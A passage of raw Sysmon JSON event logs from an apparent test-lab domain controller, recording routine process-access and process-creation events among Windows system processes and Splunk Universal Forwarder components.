05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3936,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3937,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3938,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3939,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-027E-5F25-0000-001064EB0500}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-027E-5F25-0000-001064EB0500}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3940,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.042\r\nSourceProcessGUID: {A837DB8D-027E-5F25-0000-001064EB0500}\r\nSourceProcessId: 1540\r\nSourceThreadId: 4892\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.042","SourceProcessGUID":"{A837DB8D-027E-5F25-0000-001064EB0500}","SourceProcessId":"1540","SourceThreadId":"4892","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3941,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.575\r\nProcessGuid: {A837DB8D-027F-5F25-0000-00103CED0500}\r\nProcessId: 4012\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.575","ProcessGuid":"{A837DB8D-027F-5F25-0000-00103CED0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3942,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-027F-5F25-0000-00103CED0500}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-027F-5F25-0000-00103CED0500}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3943,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-027F-5F25-0000-00103CED0500}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-027F-5F25-0000-00103CED0500}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3944,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 